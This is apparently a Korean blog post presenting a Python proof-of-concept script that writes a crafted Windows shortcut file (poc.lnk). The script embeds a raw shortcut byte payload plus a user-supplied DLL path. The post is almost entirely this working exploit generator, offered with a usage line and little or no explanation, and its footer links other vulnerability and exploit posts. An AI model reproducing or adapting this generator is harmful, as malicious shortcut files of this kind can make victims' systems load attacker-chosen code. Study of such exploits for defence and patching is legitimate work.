ex) test.py c:\dll.dll

import sys

def u(s):
    lst = []
    for ch in s:
        ch = ch+"\x00"
        lst.append(ch)
    return reduce(lambda x,y:x+y, lst)


payload = "\x4C\x00\x00\x00\x01\x14\x02\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x46\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF2\x00\x14\x00\x1F\x50\xE0\x4F\xD0\x20\xEA\x3A\x69\x10\xA2\xD8\x08\x00\x2B\x30\x30\x9D\x14\x00\x2E\x00\x20\x20\xEC\x21\xEA\x3A\x69\x10\xA2\xDD\x08\x00\x2B\x30\x30\x9D\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6A\x00\x00\x00\x00\x00\x00\x1E\x00\x22\x00"
payload = payload + u(sys.argv[1])+ "\x00\x00\xDC\xC2\xA4\xC2\x5C\xD1\x00\x00\xF4\xCE\xE8\xD4\x30\xD1\x20\x00\xDC\xC2\xA4\xC2\x5C\xD1\xD0\xC5\x20\x00\x00\xB3\x5C\xD5\x20\x00\x15\xC8\xF4\xBC\x7C\xB9\x20\x00\xF4\xBC\xE0\xAC\x2C\x00\x20\x00\x58\xD5\xDC\xB4\xE8\xC6\xB4\xC5\x2C\x00\x20\x00\x31\xC1\xA5\xB2\x20\x00\x0F\xBC\x20\x00\x90\xC7\xD9\xB3\x20\x00\xC5\xC5\x70\xB3\x74\xC7\xB8\xD2\xD0\xC5\x20\x00\x00\xB3\x5C\xD5\x20\x00\x24\xC1\x15\xC8\x44\xC7\x20\x00\xC0\xBC\xBD\xAC\x69\xD5\xC8\xB2\xE4\xB2\x2E\x00\x00\x00\x00\x00\x00\x00\x00\x00"
fil = open("poc.lnk","w")
fil.write(payload)
fil.close()

'vulnerability' 카테고리의 다른 글

GOM Player 2.1.33.5071 exploit  (0) 2011.12.09
CVE ID 받기  (0) 2011.03.31
html file upload form  (0) 2010.06.24
Java Deployment Toolkit Test Page  (0) 2010.04.19
XE 1.4.0.10 XSS/CSRF 취약점  (0) 2010.04.16
Posted by applicationlayer
: